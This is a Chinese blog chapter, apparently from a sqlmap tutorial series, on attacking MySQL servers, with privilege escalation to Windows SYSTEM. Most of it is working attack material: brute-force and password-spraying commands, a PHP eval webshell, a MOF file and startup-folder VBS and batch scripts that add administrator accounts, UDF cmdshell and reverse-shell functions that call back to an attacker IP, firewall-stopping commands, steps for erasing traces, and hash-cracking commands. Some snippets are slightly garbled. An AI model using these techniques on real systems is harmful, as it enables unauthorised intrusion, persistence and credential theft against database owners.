zoukankan      html  css  js  c++  java
  • sqlmap从入门到精通-第五章-5-5 MySQL数据库渗透及漏洞利用总结

    5.5 MySQL数据库渗透及漏洞利用总结

    5.5.1 MySQL信息搜集

    1. 端口信息收集

    MySQL默认端口是3306端口,也可以自定义端口,可以利用扫描软件进行探测。

    (1) iisputter: 直接写3306端口,IP地址写单个或者范围都可以或者进行C段扫描

    (2) nmap扫描: nmap -p 3306 10.23.11.1-254

    如果是针对特定目标进行端口扫描渗透,可以进行全端口扫描,端口扫描软件还可以使用Windows环境下的sfind扫描

    2. 版本信息收集

    (1) MSF查看版本信息auxiliary/scanner/mysql/mysql_version模块,以扫描主机10.23.11.3测试

    use auxiliary/scanner/mysql/mysql_version

    set rhosts 10.23.11.3

    run

    (2) MySQL查询版本命令

    select @@version

    select version();

    (3) sqlmap通过注入点扫描确认信息

    sqlmap.py -u url --dbms mysql

    (4) phpMyAdmin 管理页面登录后查看localhost-变量-服务器变量和设置中的version参数值

    3. 数据库管理信息搜集

    MySQL数据库管理工具很多,有phpMyAdmin网站管理,Navicat for MySQL,MySQLFront等各种客户端工具,这些工具都会保存配置信息,其中就包含数据库的地址,账户,密码,还有其他的方法就是通过嗅探或者破解配置文件可以获取密码等信息

    4. MSF信息收集模块

    (1) MySQL哈希值枚举

    use auxiliary/scanner/mysql/mysql_hashdump

    set username root

    set password 123456

    run

    (2) 获取相关信息

    use auxiliary/admin/mysql/mysql_enum

    set username root

    set password 123456

    run

    上述是获取数据库的版本,操作系统名称,架构,数据库目录,用户及密码哈希值等

    (3) 执行MySQL语句,连接成功之后可以在MSF执行SQL语句,跟sqlmap 的参数--sql-shell类似

    use auxiliary/admin/mysql/mysql_sql

    (4) 将mysql_schem导出到本地/root/.msf4/loot/文件夹下

    use auxiliary/scanner/mysql/mysql_schemadump

    (5) 文件枚举和目录可写信息枚举

    use auxiliary/scanner/mysql/mysql_file_enum

    use auxiliary/scanner/mysql/mysql_writable_dirs

    作者反馈并没有测试成功过,需要定义枚举目录和相关文件,基本没啥用

    5.5.2 MySQL密码获取

    1. 暴力破解

    MySQL暴力破解主要有以下几种

    (1) 网页在线连接破解

    可以使用Burpsuite和phpMyAdmin进行多线程批量破解,这个前面章节都讲解过,Burpsuite课程我也讲过并且放在B上了

    (2) MSF通过命令行进行暴力破解

    对应MSF的破解MySQL数据库密码模块 auxiliary/scanner/mysql/mysql_login ,里面的主要参数大家可以在MSF上切到此模块查看帮助

    场景一:对内网获取root的某一个口令进行密码喷洒

    use auxiliary/scanner/mysql/mysql_login

    set RHOSTS 10.23.11.1-254

    set uesrname root

    set password 123456

    run

    上述会对一个C段网络进行MySQL的密码扫描破解尝试

    场景二:使用密码字典进行扫描

    use auxiliary/scanner/mysql/mysql_login

    set RHOSTS 10.23.11.1-254

    set pass_file /root/data/wordlist/pass.txt

    set username root

    run

    (3) 使用nmap扫描并破解密码

    * 对某一个IP地址或者地址段进行nmap默认密码扫描暴力破解

    nmap --script=mysql-brute 10.22.12.33

    nmap --script=mysql-brute 10.22.12.1-254

    * 使用root账户和密码进行MySQL密码验证并扫描获取指定IP地址的端口信息及MySQL数据库相关信息

    nmap -sV --script=mysql-databases --script-argsmysqluser=root, mysqlpass=root 10.22.13.234

    * 检查root空口令

    nmap --script mysql-empty-password 10.22.12.33

    (4) 使用hscan工具对MySQL口令进行扫描

    2. 源代码泄露

    (1) 网站源代码备份文件

    常见的数据库文件有config.php , web.config , conn.asp , db.php/asp , jdbc.properties , sysconfig.properties , JBOSS_HOMEdocsexamplesjcaxxxx-ds.xml

    (2) 配置文件备份

    使用UltraEdit编辑器编辑数据库文件会生成bak文件,这个编辑器默认开启了自动备份功能

    3. 文件包含

    本地文件包含漏洞可以包含文件,通过查看文件代码获取数据库配置文件,知道配置文件,一般就知道了用户名和密码

    4. 其他情况

    某些软件将IP地址,数据库用户名和密码写进程程序,运行程序之后,通过Cain软件进行嗅探,可以获取数据库密码,其次就是一些数据库客户端工具,有的会记录连接记录,这些连接记录保存了用户名,密码和连接IP地址或主机名,通过嗅探的方式还是可以获取用户名和密码

    5.5.3 MySQL获取webshell

    1. phpMyAdmin的root账号获取webshell

    这个前面的课程讲解了很多,这里不再赘述

    2. sqlmap注入点获取webshell

    前面章节也讲过,顺带提一下

    sqlmap.py -u url --os-shell

    echo "<?php @eval($_POST)['bmfx']);?>" > /data/www/shit.php

    5.5.4 webshell上传MOF文件提权

    MySQL Root权限MOF方法提权是来自国外Kingcope大牛发布的MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit( https://www.exploit-db.com/exploits/23083/),简称mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day)。Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件:

    方法1:运行 MOF 文件指定为命令行参数 Mofcomp.exe文件。

    方法2:使用 IMofCompiler 接口和 $CompileFile方法。

    方法3:拖放到 %SystemRoot%System32WbemMOF文件夹的MOF文件。

    Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mofcomp.exe 文件,或使用IMofCompiler::CompileFile方法。第三种方法仅为向后兼容性与早期版本的?WMI提供,并因为此功能可能不会提供在将来的版本后,不应使用。注意使用MOF方法提权的前提是当前Root帐号可以复制文件到%SystemRoot%System32WbemMOF目录下,否则会失败!

    该漏洞的利用前提条件是必须具备mysql的root权限,在Kingcope公布的0day中公布了一个pl利用脚本。

    perl mysql_win_remote.pl 192.168.2.100 root "" 192.168.2.150 5555

    192.168.2.100为mysql数据库所在服务器,mysql口令为空,反弹到192.168.2.150的5555端口上。

    1. 生成nullevt.mof文件

    将以下代码保存为nullevt.mof文件:

    #pragma namespace("\\.\root\subscription")

    instance of __EventFilter as $EventFilter

    {

    EventNamespace = "Root\Cimv2";

    Name = "filtP2";

    Query = "Select From __InstanceModificationEvent "

    "Where TargetInstance Isa "Win32_LocalTime" "

    "And TargetInstance.Second = 5";

    QueryLanguage = "WQL";

    };

    instance of ActiveScriptEventConsumer as $Consumer

    {

    Name = "consPCSV2";

    ScriptingEngine = "JScript";

    ScriptText =

    "var WSH = new ActiveXObject("WScript.Shell") WSH.run("net.exe user admin admin /add")";

    };

    instance of __FilterToConsumerBinding

    {

    Consumer = $Consumer;

    Filter = $EventFilter;

    };

    2. 通过Mysql查询将文件导入

    执行以下查询语句,将上面生成的nullevt.mof导入到c:windowssystem32wbemmof目录下在windows7中默认是拒绝访问的。导入后系统会自动运行,执行命令。

    selectload_file('C:\RECYCLER\nullevt.mof') into dumpfile 'C:/windows/system32/wbem/mof/nullevt.mof';

    5.5.5 MSF直接MOF提权

    MSF下的exploit/windows/mysql/mysql_mof模块提供了直接Mof提权,不过该漏洞成功跟操作系统权限和Mysql数据库版本有关,执行成功后会直接反弹shell到meterpreter。

    use exploit/windows/mysql/mysql_mof

    set rhost 192.168.157.1 //设置需要提权的远程主机IP地址

    set rport 3306 //设置mysql的远程端口

    set password root //设置mysql数据库root密码

    set username root //设置mysql用户名

    options //查看设置

    run 0

    技巧:

    要是能够通过网页连接管理(phpmyadmin),则可以修改host为%并刷新权限后,则可以通过msf等工具远程连接数据库。默认root等账号不允许远程连接,除非管理员或者数据库用户自己设置。

    方法1:本地登入mysql,更改?mysql数据库里的?user?表里的?host项,将localhost改为%

    use mysql;

    update user set host = '%' where user = 'root';

    FLUSH PRIVILEGES ;

    select host, user from user;

    方法2:直接授权(推荐)

    从任何主机上使用root用户,密码:youpassword(你的root密码)连接到mysql服务器:

    # mysql -u root -proot

    GRANT ALL PRIVILEGES ON . TO 'root'@'%' IDENTIFIED BY 'youpassword' WITH GRANT OPTION;

    FLUSH PRIVILEGES;

    推荐重新增加一个用户,在实际测试过程中发现很多服务器使用root配置了多个地址,修改后可能会影响实际系统的运行。在实际测试过程中因此建议新增一个用户,授权所有权限,而不是直接更改root配置。

    5.5.6 UDF提权

    UDF提权是利用MYSQL的自定义函数功能,将MYSQL账号转化为系统system权限,其利用条件是目标系统是Windows(Win2000,XP,Win2003);拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数,有root账号密码

    Windows下UDF提权对于Windows2008以下服务器比较适用,也即针对Windows2000、Windows2003的成功率较高。

    1. UDF提权条件

    (1) Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的libplugin文件夹下。

    (2) Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:windowssystem32,在windows2000下放置于c:winntsystem32。

    (3) 掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,一般以root账号为佳,具备`root账号所具备的权限的其它账号也可以。

    (4) 可以将udf.dll写入到相应目录的权限。

    2. 提权方法

    (1) 获取数据库版本、数据位置以及插件位置等信息

    select version();//获取数据库版本

    select user();//获取数据库用户

    select @@basedir ;//获取安装目录

    show variables like '%plugins%'; //寻找mysql安装路径

    (2) 导出路径

    C:Winntudf.dll Windows 2000

    C:Windowsudf.dll Windows2003(有的系统被转义,需要改为C:Windowsudf.dll)

    MYSQL 5.1以上版本,必须要把udf.dll文件放到MYSQL安装目录下的libplugin文件夹下才能创建自定义函数。该目录默认是不存在的,这就需要我们使用webshell找到MYSQL的安装目录,并在安装目录下创建libplugin文件夹,然后将udf.dll文件导出到该目录即可。

    在某些情况下,我们会遇到Can’t open shared library的情况,这时就需要我们把udf.dll导出到libplugin目录下才可以,网上大牛发现利用NTFS ADS流来创建文件夹的方法:

    select @@basedir; //查找到mysql的目录

    select 'It is dll' into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib::$INDEX_ALLOCATION'; //利用NTFS ADS创建lib目录

    select 'It is dll' into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin::$INDEX_ALLOCATION';//利用NTFS ADS创建plugin目录

    执行成功以后就会plugin目录,然后再进行导出udf.dll即可。

    (3) 创建cmdshell 函数,该函数叫什么名字在后续中则使用该函数进行查询:

    create function cmdshell returns string soname ‘lib_mysqludf_sys.dll’;

    (4) 执行命令

    select sys_eval(‘whoami’);

    一般情况下不会出现创建不成功哦。

    连不上3389可以先停止windows防火墙和筛选

    select sys_eval(‘net stop policyagent’);

    select sys_eval(‘net stop sharedaccess’);

    udf.dll下常见函数:

    cmdshell 执行cmd;

    downloader 下载者,到网上下载指定文件并保存到指定目录;

    open3389 通用开3389终端服务,可指定端口(不改端口无需重启);

    backshell 反弹Shell;

    ProcessView 枚举系统进程;

    KillProcess 终止指定进程;

    regread 读注册表;

    regwrite 写注册表;

    shut 关机,注销,重启;

    about 说明与帮助函数;

    具体用户示例:

    select cmdshell('net user iis_user 123!@#abcABC /add');

    select cmdshell('net localgroup administrators iis_user /add');

    select cmdshell('regedit /s d:web3389.reg');

    select cmdshell('netstat -an');

    (5) 清除痕迹

    drop function cmdshell;//将函数删除

    删除udf.dll文件以及其它相关入侵文件及日志。

    (6) 常见错误

    1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

    在my.ini或者mysql.cnf文件中注销 (使用#号) 包含secure_file_priv的行(SHOW VARIABLES LIKE “secure_file_priv”)。

    1123 - Can't initialize function 'backshell';

    UDFs are unavailable with the --skip-grant-tables option

    需要将my.ini中的skip-grant-tables选项去掉。

    3. webshell下UDF提权

    通过集成udf提权的webshell输入数据库用户名及密码以及数据库服务器地址或者IP通过连接后导出进行提权。

    4. Mysql提权综合利用工具

    v5est0r 写了一个Mysql提权综合利用工具,详细情况请参考其代码共享网站: https://github.com/v5est0r/Python_FuckMySQL其主要功能有:

    (1) 自动导出你的backdoor和mof文件

    (2) 自动判断mysql版本,根据版本不同导出UDF的DLL到不同目录,UDF提权

    (3) 导出LPK.dll文件,劫持系统目录提权

    (4) 写启动项提权

    UDF自动提权:

    python root.py -a 127.0.0.1 -p root -e "ver&whoami" -m udf

    LPK劫持提权:

    python root.py -a 127.0.0.1 -p root -e "ver&whoami" -m lpk

    启动项提权:

    python root.py -a 127.0.0.1 -p root -e "ver&whoami" –mst

    例如通过LOAD_FILE来查看Mysql配置文件my.ini,如果其中配置了skip-grant-tables,这无法进行提权

    5.5.7 无法获取webshell提权

    1. 连接mysql

    (1) mysql.exe -h ip -uroot -p

    (2) phpmyadmin

    (3) Navicat for MySQL

    2. 查看数据库版本和数据路径

    SELECT VERSION( );

    Select @@datadir;

    5.1以下版本,将dll导入到c:/windows或者c:/windows/system32/

    5.1以上版本 通过以下查询来获取插件路径:

    SHOW VARIABLES WHERE Variable_Name LIKE "%dir";

    show variables like '%plugin%' ;

    select load_file('C:/phpStudy/Apache/conf/httpd.conf')

    select load_file('C:/phpStudy/Apache/conf/vhosts.conf')

    select load_file('C:/phpStudy/Apache/conf/extra/vhosts.conf')

    select load_file('C:/phpStudy/Apache/conf/extra/httpd.conf')

    select load_file('d:/phpStudy/Apache/conf/vhosts.conf')

    3. 修改mysql.txt

    mysql.txt为udf.dll的二进制文件转成十六进制代码。

    (1) 先执行导入ghost表中的内容

    修改以下代码的末尾代码

    select backshell(“YourIP”,4444);

    (2) 导出文件到某个目录

    select data from Ghost into dumpfile 'c:/windows/mysqldll.dll';

    select data from Ghost into dumpfile 'c:/windows/system32/mysqldll';

    select data from Ghost into dumpfile 'c:/phpStudy/MySQL/lib/plugin/mysqldll';

    select data from Ghost into dumpfile 'E:/PHPnow-1.5.6/MySQL-5.0.90/lib/plugin/mysqldll';

    select data from Ghost into dumpfile 'C:/websoft/MySQL/MySQL Server 5.5/lib/plugin/mysqldll.dll'

    select data from Ghost into dumpfile 'D:/phpStudy/MySQL/lib/plugin/mysqldll.dll';

    select load_file('C:/ProgramData/MySQL/ MySQL Server 5.1/Data/mysql/user.frm');

    select data from Ghost into dumpfile 'C:Program FilesMySQLMySQL Server 5.1lib/plugin/mysqldll.dll'

    (3) 查看FUNCTION中是否存在cmdshell和backshell

    如果存在就删除:

    drop FUNCTION cmdshell;//删除cmdshell

    drop FUNCTION backshell;//删除backshell

    创建backshell:

    CREATE FUNCTION backshell RETURNS STRING SONAME 'mysqldll.dll'; //创建backshell

    在具备独立主机的服务器上执行监听:

    nc -lvnp 9988

    执行查询:

    select backshell("192.192.192.1",9988);//修改192.192.192.1为你的IP和端口

    4. 获取webshell后添加用户命令

    注意如果不能直接执行,则需要到c:windowssystem32下执行

    net user bmfxtest bmfxtest /add

    net localgroup administrators bmfxtest

    5.5.8 sqlmap直连数据库提权

    Sqlmap直接连接数据库提权,需要有写入权限和root账号及密码,命令如下:

    (1) 连接数据库

    sqlmap.py -d "mysql://root:123456@219.115.1.1:3306/mysql" --os-shell

    (2) 选择操作系统的架构,32位操作系统选择1,64位选择2.

    (3) 自动上传udf或提示--os-shell

    (4)执行whomai命令如果获取系统权限,则表示提权成功。

    上述在前面章节讲过并演示

    5.5.9 MSF下UDF提权

    Kali渗透测试平台下执行(kali下载地 https://www.kali.org/downloads/):

    msfconsole

    use exploit/windows/mysql/mysql_payload

    options

    set rhost 192.168.2.1

    set rport 3306

    set username root

    set password 123456

    run 0或者exploit

    MSF下YDF提权成功率并不高,跟windows操作系统版本,权限和数据库版本有关,特别是secure-file-priv选项,如果有该选项基本不会成功

    5.5.10 启动项提权

    1. 创建表并插入vbs脚本到表中

    依次使用以下命令:

    show databases ;

    use test;

    show tables;

    create table a (cmd text);

    insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );

    insert into a values ("a=wshshell.run (""cmd.exe /c net user aspnet aspnet /add"",0)") ;

    insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators aspnet /add"",0) " );

    select * from a;

    2. 导出vbs脚本到启动

    使用以下命令将刚才在a表中创建的vbs脚本导出到启动选项中。

    select * from a into outfile "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\a.vbs";

    导入成功后,系统重新启动时会自动添加密码为“1”且用户名称为“1”的用户到管理员组中。在实际使用过程中该脚本成功执行的几率比较低,有时候会出现不能导出的错误

    推荐使用以下脚本:

    show databases ;

    use test;

    show tables;

    create table b (cmd text);

    insert into b values ("net user aspnet 123456 /add");

    insert into b values ("net localgroup administrators aspnet /add");

    insert into b values ("del b.bat");

    select from b into outfile "C:\Documents and Settings\All Users\ 「开始」菜单\程序\启动\b.bat";

    该脚本执行后虽然会闪现Dos窗口,如果有权限导入到启动选项中,则一定会执行成功,在虚拟机中通过MySQL连接器连接并执行以上命令后,在C:Documents and SettingsAll Users「开始」菜单程序启动目录中会有刚才导出的b.bat脚本文件

    说明:

    在不同的操作系统中C:Documents and SettingsAll Users「开始」菜单程序启动目录文件名称可能会不同,这个时候就要将其目录换成相应的目录名称即可。例如如果是英文版本操作系统则其插入的代码为:

    select from b into outfile "C:\Documents and Settings\All Users\ Start Menu\Programs\Startup\b.bat";

    Windows 2008 Server的启动目录为:

    C:\ProgramData\Microsoft\Windows \Start Menu\Programs\Startup\iis.vbs

    其vbs方法可以参考如下写法:

    create table a (cmd text);

    insert into a values ("set wshshell= createobject (""wscript.shell"" ) " );

    insert into a values ("a=wshshell.run (""cmd.exe /c net user antian365 qwer1234!@# /add"",0) " );

    insert into a values ("b=wshshell.run ("" cmd.exe /c net localgroup Administrators antian365 /add"",0) " );

    select from a into outfile "C:\ProgramData\Microsoft\ Windows\Start Menu\Programs\Startup\iis.vbs";

    5.5.11 MSF下模块exploit/windows/mysql/mysql_start_up提权

    提权命令如下:

    use exploit/windows/mysql/mysql_start_up

    set rhost 192.168.2.1

    set rport 3306

    set username root

    set password 123456

    run

    MSF下mysql_start_up提权有一定的几率,对英文版系统支持较好。

    5.5.12 MSF其他相关漏洞提权

    (1) Mysql身份认证漏洞及利用(CVE-2012-2122)

    当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。受影响的产品: All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 存在漏洞

    MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23不存在漏洞

    MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not不存在漏洞

    use auxiliary/scanner/mysql/ mysql_authbypass_hashdump

    (2) MSF下利用程序:exploit/windows/mysql/mysql_yassl_hello

    (3) MSF下利用程序:exploit/windows/mysql/scrutinizer_upload_exec

    5.5.13 MySQL密码破解

    1. Cain工具破解mysql密码

    使用UltraEdit-32编辑器直接打开user.MYD文件,打开后使用二进制模式进行查看,在root用户后面是一串字符串,选中这些字符串将其复制到记事本中,这些字符串即为用户加密值,例如506D1427F6F61696B4501445C90624897266DAE3。

    需要注意以下几点:

    (1) root后面的"*"不要复制到字符串中。

    (2) 在有些情况下需要往后面看看,否则得到的不是完整的MYSQLSHA1密码,总之其正确的密码位数是40位。

    安装cain工具,使用cracker,右键单击“Add tolist”将Mysql Hashes值加入到破解列表中,使用软件中的字典、暴力破解等方式来进行暴力破解。

    2. 网站在线密码破解

    (1) cmd5.com破解。将获取的mysql值放在cmd5.com网站中进行查询,mysql密码一般都是收费的。

    (2) somd5.com破解。Somd5.com是后面出现的一个免费破解网站,每次破解需要手工选择图形码进行破解,速度快,效果好,只是每次只能破解一个,而且破解一次后需要重新输入验证码。

    3. oclhash破解

    hashcat支持很多种破解算法,免费开源软件,官方网站 https://hashcat.net/hashcat/,破解命令:

    hashcat64.exe -m 200myql.hashpass.dict //破解MySQL323类型

    hashcat64.exe -m 300myql.hashpass.dict //破解MySQL4.1/MySQL5类型

    4. John the Ripper password cracker

    John the Ripper下载地址: http://www.openwall.com /john/h/john179w2.zip,John the Ripper除了能够破解linux外,还能破解多种格式的密码。

    Echo 81F5E21E35407D884A6CD4A731AEBFB6AF209E1B> hashes.txt

    John –format =mysql-sha1 hashes.txt

    john --list=formats | grep mysql //查看支持mysql密码破解的算法

    参考:

    http://www.uml.org.cn/sjjm/201712113.asp

    https://yq.aliyun.com/articles/496266


     
  • 相关阅读:
    Python-单例模式
    Django 内置模板标签和过滤器
    Python Built-in Function 学习笔记
    Django 中间件
    Django Form
    Ajax
    Django中cookie和session
    Django中的QuerySet
    Django模型和ORM
    wordpress添加子主题
  • 原文地址:https://www.cnblogs.com/autopwn/p/13307327.html
Copyright © 2011-2022 走看看